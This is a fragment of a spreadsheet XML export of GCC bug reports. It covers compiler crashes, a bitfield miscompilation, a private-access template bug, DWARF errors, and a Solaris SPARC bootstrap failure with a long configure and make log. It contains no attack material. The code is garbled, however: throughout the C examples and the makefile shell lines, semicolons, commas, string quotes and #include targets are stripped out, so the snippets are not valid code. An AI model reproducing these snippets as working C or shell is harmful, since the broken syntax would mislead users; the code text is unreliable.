                (const_int 32760 [0x7ff8])) [0 t.6656+0 S8 A8])
        (reg:DI 27 27)) 282 {*movdi_internal32} (nil)
    (nil))
/home/tbm/14406.c:2073: internal compiler error: in reload_cse_simplify_operands at postreload.c:392
Please submit a full bug report
I've been running delta for 10 days (!) now but the file hasn't gotten
smaller than 150KB yet.</t>
  </si>
  <si>
    <t>GCC-32466</t>
  </si>
  <si>
    <t>illegal loop store motion of bitfield</t>
  </si>
  <si>
    <t>#include 
void __attribute__ ((__noinline__))
add14(unsigned short int nextID)
{
  struct {
    unsigned short int id: 14
  } hdr
  hdr.id = nextID
  do {
    hdr.id++
    if (printf (should print 0x0000: 0x%04X\n (unsigned int)hdr.id))
      break
  } while (1)
}
main()
{
  add14 (0x3FFF)
  return 0
}
G++ miscompiles with optimization.  GCC compiles correctly.  Regression from 3.3.</t>
  </si>
  <si>
    <t>GCC-10521</t>
  </si>
  <si>
    <t>possible access to private elements</t>
  </si>
  <si>
    <t>With a default value for a template parameter it is possible to access private elements. In the example below you get access to the private class A::type.
The compile doesn't realize or ignores the private access.
Release:
gcc version 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
Environment:
x86Redhat 9
How-To-Repeat:
class A{
private:
   class type{}
}
template
class B{
  type v
}
int main(){
  //  B b1 doesn't work -&gt; ok
  B b //not ok
}</t>
  </si>
  <si>
    <t>lauterba</t>
  </si>
  <si>
    <t>GCC-26204</t>
  </si>
  <si>
    <t>[4.0 only] warnings in java front-end sources</t>
  </si>
  <si>
    <t>[...]
make[2]: Leaving directory `/tmp/gcc-4.0.2/build'
make[2]: Entering directory `/tmp/gcc-4.0.2/build/stage2-gcc'
/tmp/gcc-4.0.2/build/prev-gcc/xgcc -B/tmp/gcc-4.0.2/build/prev-gcc/ -B/usr/local/i686-pc-linux-gnu/bin/ -c   -O2 -g -fomit-frame-pointer -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -pedantic -Wno-long-long -Wno-variadic-macros -Wold-style-definition -Werror    -DHAVE_CONFIG_H -I. -Ijava -I../../gcc -I../../gcc/java -I../../gcc/../include -I../../gcc/../libcpp/include     ../../gcc/java/jcf-write.c -o java/jcf-write.o
cc1: warnings being treated as errors
../../gcc/java/jcf-write.c: In function 'generate_bytecode_insns':
../../gcc/java/jcf-write.c:2236: warning: unused variable 'type'
make[2]: *** [java/jcf-write.o] Error 1
make[2]: Leaving directory `/tmp/gcc-4.0.2/build/stage2-gcc'
make[1]: *** [all-stage2-gcc] Error 2
make[1]: Leaving directory `/tmp/gcc-4.0.2/build'
make: *** [stage2-bubble] Error 2</t>
  </si>
  <si>
    <t>GCC-45299</t>
  </si>
  <si>
    <t>Dwarf information is wrong with optimised code.</t>
  </si>
  <si>
    <t>I saw this problem initially on 4.5.0 compiler but the same problem happens on mainline too. In function arraysum in the attached example the parameter array which is a pointer to array of</t>
  </si>
  <si>
    <t>hariharan.gcc</t>
  </si>
  <si>
    <t>GCC-4332</t>
  </si>
  <si>
    <t>gcc fails to bootstrap on 32-bit Sun SPARC 20 with Solaris</t>
  </si>
  <si>
    <t>gcc 3.0.1 fails to bootstrap properly on my Sun SPARCstation 20. The Sun has
gcc 3.0 installed so I attempted compilation with gcc 3.0. (3.0 had
bootstraped properly with no problems when it was built from gcc 2.9.5)
The following shows the output from the makefile that produces the problem. 
I have put the complete output from the makefile in the bottom of the email   
under the 'how to repeat' section but this shows the lines that seem to
result in the makefile looking for a non existant file gthr.h 
ln: ./stl_hashtable.h: File exists
ln: ./stl_hash_fun.h: File exists
sed -e '/^#/s/\([ABCDEFGHIJKLMNOPQRSTUVWXYZ_][ABCDEFGHIJKLMNOPQRSTUVWXYZ_]*\)/_GLIBCPP_\1/g' \
    -e 's^#include \(.*\)#include g' \
     sparc-sun-solaris2.8/bits/gthr.h
/bin/sh: /usr/local/src/gcc-3.0.1/sparc-sun-solaris2.8/libstdc++-v3/../gcc/gthr.h: cannot open
make[4]: *** [sparc-sun-solaris2.8/bits/gthr.h] Error 1
Release:
3.0.1
Environment:
System: SunOS parrot 5.8 Generic_108528-09 sun4m sparc SUNWSPARCstation-20
Architecture: sun4
host: sparc-sun-solaris2.8
build: sparc-sun-solaris2.8
target: sparc-sun-solaris2.8
configured with: configure --prefix=/usr/local/stow/gcc-3.0.1
How-To-Repeat:
gtar xvfz gcc-3.0.1.tar.gz 
cd gcc-3.0.1
configure --prefix=/usr/local/stow/gcc-3.0.1
make bootstrap
The above fails every time at the same point. 
I've attached the output of such a command set
Script started on Sat Sep 15 10:51:22 2001
parrot / # cd /usr/local/src/gcc-3.0.1
parrot /usr/local/src/gcc-3.0.1 # configure --prefix=/usr/local/stow/gcc-3.0.1
Configuring for a sparc-sun-solaris2.8 host.
*** This configuration is not supported in the following subdirectories:
     target-libffi target-boehm-gc target-zlib target-libjava
    (Any other directories should still work fine.)
Created Makefile in /usr/local/src/gcc-3.0.1 using mh-frag
Word too long
Configuring libiberty...
creating cache ../config.cache
checking host system type... sparc-sun-solaris2.8
checking build system type... sparc-sun-solaris2.8
checking for ar... ar
checking for ranlib... ranlib
checking for gcc... gcc
checking whether we are using GNU C... yes
checking whether gcc accepts -g... yes
checking for POSIXized ISC... no
checking for working const... yes
checking for inline... inline
checking for a BSD compatible install... /usr/local/bin/install -c
checking how to run the C preprocessor... gcc -E
checking for sys/file.h... yes
checking for sys/param.h... yes
checking for limits.h... yes
checking for stdlib.h... yes
checking for string.h... yes
checking for unistd.h... yes
checking for strings.h... yes
checking for sys/time.h... yes
checking for time.h... yes
checking for sys/resource.h... yes
checking for sys/stat.h... yes
checking for sys/mman.h... yes
checking for fcntl.h... yes
checking for sys/wait.h that is POSIX.1 compatible... yes
checking whether time.h and sys/time.h may both be included... yes
checking whether errno must be declared... no
checking whether the C compiler (gcc -g -O2 ) works... yes
checking whether the C compiler (gcc -g -O2 ) is a cross-compiler... no
checking for asprintf... no
checking for atexit... yes
checking for basename... yes
checking for bcmp... yes
checking for bcopy... yes
checking for bsearch... yes
checking for bzero... yes
checking for calloc... yes
checking for clock... yes
checking for getcwd... yes
checking for getpagesize... yes
checking for index... yes
checking for insque... yes
checking for memchr... yes
checking for memcmp... yes
checking for memcpy... yes
checking for memmove... yes
checking for memset... yes
checking for mkstemps... no
checking for putenv... yes
checking for random... yes
checking for rename... yes
checking for rindex... yes
checking for setenv... no
checking for sigsetmask... no
checking for strcasecmp... yes
checking for strchr... yes
checking for strdup... yes
checking for strncasecmp... yes
checking for strrchr... yes
checking for strstr... yes
checking for strtod... yes
checking for strtol... yes
checking for strtoul... yes
checking for tmpnam... yes
checking for vasprintf... no
checking for vfprintf... yes
checking for vprintf... yes
checking for vsprintf... yes
checking for waitpid... yes
checking for working alloca.h... yes
checking for alloca... yes
checking for ANSI C header files... yes
checking for pid_t... yes
checking for vfork.h... no
checking for working vfork... yes
checking for sys_errlist... yes
checking for sys_nerr... yes
checking for sys_siglist... no
checking for getrusage... yes
checking for on_exit... no
checking for psignal... yes
checking for strerror... yes
checking for strsignal... yes
checking for sysconf... yes
checking for times... yes
checking for sbrk... yes
checking for gettimeofday... yes
checking for unistd.h... (cached) yes
checking for getpagesize... (cached) yes
checking for working mmap... yes
checking for working strncmp... no
updating cache ../config.cache
creating ./config.status
creating Makefile
creating testsuite/Makefile
creating config.h
Configuring zlib...
loading cache ../config.cache
checking host system type... sparc-sun-solaris2.8
checking target system type... sparc-sun-solaris2.8
checking build system type... sparc-sun-solaris2.8
checking for a BSD compatible install... (cached) /usr/local/bin/install -c
checking whether build environment is sane... yes
checking whether make sets ${MAKE}... yes
checking for working aclocal... found
checking for working autoconf... found
checking for working automake... found
checking for working autoheader... found
checking for working makeinfo... found
checking whether to enable maintainer-specific portions of Makefiles... no
checking for gcc... (cached) gcc
checking whether we are using GNU C... (cached) yes
checking whether gcc accepts -g... (cached) yes
checking for ld used by GCC... /usr/ccs/bin/ld
checking if the linker (/usr/ccs/bin/ld) is GNU ld... no
checking for /usr/ccs/bin/ld option to reload object files... -r
checking for BSD-compatible nm... /usr/ccs/bin/nm -p
checking whether ln -s works... yes
checking how to recognise dependant libraries... pass_all
checking for object suffix... o
checking for ranlib... (cached) ranlib
checking for strip... strip
updating cache ../config.cache
loading cache ../config.cache within ltconfig
checking whether -lc should be explicitly linked in... yes
checking for objdir... .libs
checking for gcc option to produce PIC... -fPIC -DPIC
checking if gcc PIC flag -fPIC -DPIC works... yes
checking if gcc static flag -static works... yes
finding the maximum length of command line arguments... 393217
checking if gcc supports -c -o file.o... yes
checking if gcc supports -fno-rtti -fno-exceptions ... yes
checking whether the linker (/usr/ccs/bin/ld) supports shared libraries... yes
checking how to hardcode library paths into programs... immediate
checking whether stripping libraries is possible... no
checking dynamic linker characteristics... solaris2.8 ld.so
checking command to parse /usr/ccs/bin/nm -p output... ok
checking if libtool supports shared libraries... yes
checking whether to build shared libraries... yes
checking whether to build static libraries... yes
creating libtool
updating cache ../config.cache
loading cache ../config.cache
checking how to run the C preprocessor... (cached) gcc -E
checking for unistd.h... (cached) yes
checking for getpagesize... (cached) yes
checking for working mmap... (cached) yes
checking for memcpy... (cached) yes
checking for strerror... (cached) yes
checking for unistd.h... (cached) yes
creating ./config.status
creating Makefile
Configuring gcc...
loading cache ../config.cache
checking LIBRARY_PATH variable... ok
checking GCC_EXEC_PREFIX variable... ok
checking host system type... sparc-sun-solaris2.8
checking target system type... sparc-sun-solaris2.8
checking build system type... sparc-sun-solaris2.8
checking for gcc... (cached) gcc
checking whether the C compiler (gcc -g -O2 ) works... yes
checking whether the C compiler (gcc -g -O2 ) is a cross-compiler... no
checking whether we are using GNU C... (cached) yes
checking whether gcc accepts -g... (cached) yes
checking whether gcc and cc understand -c and -o together... yes
checking for long double... yes
checking for built-in _Bool... no
checking whether gcc accepts -Wno-long-long... yes
checking whether make sets ${MAKE}... (cached) yes
checking whether a default assembler was specified... no
checking whether a default linker was specified... no
checking for GNU C library... no
checking for inline... (cached) inline
checking for mawk... no
checking for gawk... gawk
checking whether ln works... yes
checking whether ln -s works... yes
checking for volatile... yes
checking for ranlib... (cached) ranlib
checking for a BSD compatible install... (cached) /usr/local/bin/install -c
checking how to run the C preprocessor... (cached) gcc -E
checking for ANSI C header files... (cached) yes
checking whether time.h and sys/time.h may both be included... (cached) yes
checking for working stdbool.h... yes
checking whether string.h and strings.h may both be included... yes
checking for sys/wait.h that is POSIX.1 compatible... (cached) yes
checking for limits.h... (cached) yes
checking for stddef.h... yes
checking for string.h... (cached) yes
checking for strings.h... (cached) yes
checking for stdlib.h... (cached) yes
checking for time.h... (cached) yes
checking for fcntl.h... (cached) yes
checking for unistd.h... (cached) yes
checking for stab.h... no
checking for sys/file.h... (cached) yes
checking for sys/time.h... (cached) yes
checking for sys/resource.h... (cached) yes
checking for sys/param.h... (cached) yes
checking for sys/times.h... yes
checking for sys/stat.h... (cached) yes
checking for direct.h... no
checking for malloc.h... yes
checking for langinfo.h... yes
checking for thread.h... yes
checking for pthread.h... yes
checking for gnatbind... no
checking for mktemp... no
checking for makeinfo... makeinfo
checking for modern makeinfo... no
configure: warning: 
*** Makeinfo is missing or too old.
*** Info documentation will not be built.
checking for recent Pod::Man... yes
checking for flex... flex
checking for bison... bison
checking for preprocessor stringizing operator... yes
checking for inttypes.h... yes
checking for unsigned enumerated bitfields... yes
checking for strtoul... (cached) yes
checking for bsearch... (cached) yes
checking for putenv... (cached) yes
checking for popen... yes
checking for bcopy... (cached) yes
checking for strchr... (cached) yes
checking for strrchr... (cached) yes
checking for kill... yes
checking for getrlimit... yes
checking for setrlimit... yes
checking for atoll... yes
checking for atoq... no
checking for sysconf... (cached) yes
checking for isascii... yes
checking for gettimeofday... (cached) yes
checking for strsignal... (cached) yes
checking for putc_unlocked... yes
checking for fputc_unlocked... no
checking for fputs_unlocked... no
checking for getrusage... (cached) yes
checking for nl_langinfo... yes
checking for lstat... yes
checking for ssize_t... yes
checking for uid_t in sys/types.h... yes
checking type of array argument to getgroups... gid_t
checking for vprintf... (cached) yes
checking for strstr... (cached) yes
checking whether the printf functions support %p... yes
checking for pid_t... (cached) yes
checking for vfork.h... (cached) no
checking for working vfork... (cached) yes
checking for getpagesize... (cached) yes
checking for working mmap from /dev/zero... no
checking for working mmap with MAP_ANON(YMOUS)... no
checking for working mmap of a file... yes
checking for iconv... yes
checking for iconv declaration... 
         extern size_t iconv (iconv_t cd const char * *inbuf size_t *inbytesleft char * *outbuf size_t *outbytesleft)
checking whether bcopy is declared... yes
checking whether getenv is declared... yes
checking whether atol is declared... yes
checking whether sbrk is declared... yes
checking whether abort is declared... yes
checking whether atof is declared... yes
checking whether getcwd is declared... yes
checking whether getwd is declared... yes
checking whether strsignal is declared... yes
checking whether putc_unlocked is declared... no
checking whether fputs_unlocked is declared... no
checking whether strstr is declared... yes
checking whether environ is declared... no
checking whether malloc is declared... yes
checking whether realloc is declared... yes
checking whether calloc is declared... yes
checking whether free is declared... yes
checking whether basename is declared... no
checking whether getopt is declared... yes
checking whether getrlimit is declared... yes
checking whether setrlimit is declared... yes
checking whether getrusage is declared... yes
checking if mkdir takes one argument... no
Using `./config/sparc/sparc.c' for machine-specific logic.
Using `./config/sparc/sparc.md' as machine description file.
Using `./config/sparc/sol2-sld.h' as target machine macro file.
Using the following host machine macro files:
	./config/sparc/xm-sysv4.h
	./config/sparc/xm-sol2.h
checking for strerror in -lcposix... no
checking for working const... (cached) yes
checking for off_t... yes
checking for size_t... yes
checking for working alloca.h... (cached) yes
checking for alloca... (cached) yes
checking for argz.h... no
checking for limits.h... (cached) yes
checking for locale.h... yes
checking for nl_types.h... yes
checking for malloc.h... (cached) yes
checking for string.h... (cached) yes
checking for unistd.h... (cached) yes
checking for sys/param.h... (cached) yes
checking for getcwd... (cached) yes
checking for munmap... yes
checking for putenv... (cached) yes
checking for setenv... (cached) no
checking for setlocale... yes
checking for strchr... (cached) yes
checking for strcasecmp... (cached) yes
checking for strdup... (cached) yes
checking for __argz_count... no
checking for __argz_stringify... no
checking for __argz_next... no
checking for stpcpy... no
checking for LC_MESSAGES... yes
checking whether NLS is requested... yes
checking whether included gettext is requested... no
checking for libintl.h... yes
checking for gettext in libc... yes
checking for msgfmt... /usr/bin/msgfmt
checking for dcgettext... yes
checking for gmsgfmt... /usr/bin/msgfmt
checking for xgettext... /usr/bin/xgettext
found xgettext program is not GNU xgettext ignore it
checking whether windows registry support is requested... yes
checking registry key on windows hosts... 3.0.1
checking what assembler to use... /usr/ccs/bin/as
checking what nm to use... nm
checking assembler alignment features... none
checking assembler subsection support... no
checking assembler weak support... yes
checking assembler hidden support... no
checking assembler leb128 support... no
checking assembler eh_frame optimization... no
checking assembler .register pseudo-op support... yes
checking assembler supports -relax... no
checking assembler dwarf2 debug_line support... no
Using ggc-page for garbage collection.
checking whether to enable maintainer-specific portions of Makefiles... no
Links are now set up to build a native compiler for sparc-sun-solaris2.8
updating cache ../config.cache
creating ./config.status
creating Makefile
creating intl/Makefile
creating po/Makefile.in
creating fixinc/Makefile
creating gccbug
creating mklibgcc
creating auto-host.h
Configuring fastjar...
loading cache ../config.cache
checking for a BSD compatible install... (cached) /usr/local/bin/install -c
checking whether build environment is sane... yes
checking whether make sets ${MAKE}... (cached) yes
checking for working aclocal... found
checking for working autoconf... found
checking for working automake... found
checking for working autoheader... found
checking for working makeinfo... found
checking for gcc... (cached) gcc
checking whether the C compiler (gcc -g -O2 ) works... yes
checking whether the C compiler (gcc -g -O2 ) is a cross-compiler... no
checking whether we are using GNU C... (cached) yes
checking whether gcc accepts -g... (cached) yes
checking for a BSD compatible install... /usr/local/bin/install -c
checking for rm... /usr/local/bin/rm
checking for cp... /usr/local/bin/cp
checking for strip... /usr/ccs/bin/strip
checking for chmod... /usr/local/bin/chmod
checking for dirent.h that defines DIR... yes
checking for opendir in -ldir... no
checking how to run the C preprocessor... (cached) gcc -E
checking for ANSI C header files... (cached) yes
checking whether struct tm is in sys/time.h or time.h... time.h
checking for fcntl.h... (cached) yes
checking for unistd.h... (cached) yes
checking for sys/param.h... (cached) yes
checking for getopt.h... no
checking for off_t... (cached) yes
checking whether struct tm is in sys/time.h or time.h... (cached) time.h
checking size of char... 1
checking size of short... 2
checking size of int... 4
checking size of long... 4
checking size of long long... 8
checking whether byte ordering is bigendian... yes
updating cache ../config.cache
creating ./config.status
creating Makefile
creating install-defs.sh
creating config.h
parrot /usr/local/src/gcc-3.0.1 # make bootsc[Ktrap
make[1]: Entering directory `/usr/local/src/gcc-3.0.1/libiberty'
if [ x != x ]  then \
  mkdir pic \
else true fi
touch stamp-picdir
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  argv.c -o pic/argv.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic argv.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  choose-temp.c -o pic/choose-temp.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic choose-temp.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  concat.c -o pic/concat.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic concat.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  cplus-dem.c -o pic/cplus-dem.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic cplus-dem.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  cp-demangle.c -o pic/cp-demangle.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic cp-demangle.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  dyn-string.c -o pic/dyn-string.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic dyn-string.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  fdmatch.c -o pic/fdmatch.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic fdmatch.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  fnmatch.c -o pic/fnmatch.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic fnmatch.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  getopt.c -o pic/getopt.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic getopt.c
getopt.c: In function `_getopt_initialize':
getopt.c:396: warning: unused parameter `argc'
getopt.c:397: warning: unused parameter `argv'
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  getopt1.c -o pic/getopt1.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic getopt1.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  getpwd.c -o pic/getpwd.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic getpwd.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  getruntime.c -o pic/getruntime.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic getruntime.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  hashtab.c -o pic/hashtab.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic hashtab.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  hex.c -o pic/hex.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic hex.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  floatformat.c -o pic/floatformat.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic floatformat.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  lbasename.c -o pic/lbasename.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic lbasename.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  md5.c -o pic/md5.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic md5.c
md5.c: In function `md5_init_ctx':
md5.c:69: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:70: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c: In function `md5_process_block':
md5.c:325: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:326: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:328: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:329: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:331: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:332: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:334: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:335: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:336: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:338: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:339: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:356: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:357: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:359: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:360: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:362: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:363: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:365: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:366: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:368: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:369: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:371: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:374: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:375: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:377: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:378: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:380: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:381: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:383: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:384: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:386: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:387: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:389: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:392: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:394: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:395: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:397: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:398: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:399: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:401: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:402: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:404: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:405: warning: integer constant is unsigned in ANSI C signed with -traditional
md5.c:407: warning: integer constant is unsigned in ANSI C signed with -traditional
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  objalloc.c -o pic/objalloc.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic objalloc.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  obstack.c -o pic/obstack.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic obstack.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  partition.c -o pic/partition.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic partition.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  pexecute.c -o pic/pexecute.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic pexecute.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  safe-ctype.c -o pic/safe-ctype.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic safe-ctype.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  sort.c -o pic/sort.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic sort.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  spaces.c -o pic/spaces.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic spaces.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  splay-tree.c -o pic/splay-tree.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic splay-tree.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  strerror.c -o pic/strerror.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic strerror.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  strsignal.c -o pic/strsignal.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic strsignal.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  xatexit.c -o pic/xatexit.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic xatexit.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  xexit.c -o pic/xexit.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic xexit.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  xmalloc.c -o pic/xmalloc.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic xmalloc.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  xmemdup.c -o pic/xmemdup.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic xmemdup.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  xstrdup.c -o pic/xstrdup.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic xstrdup.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  xstrerror.c -o pic/xstrerror.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic xstrerror.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  asprintf.c -o pic/asprintf.o \
else true fi
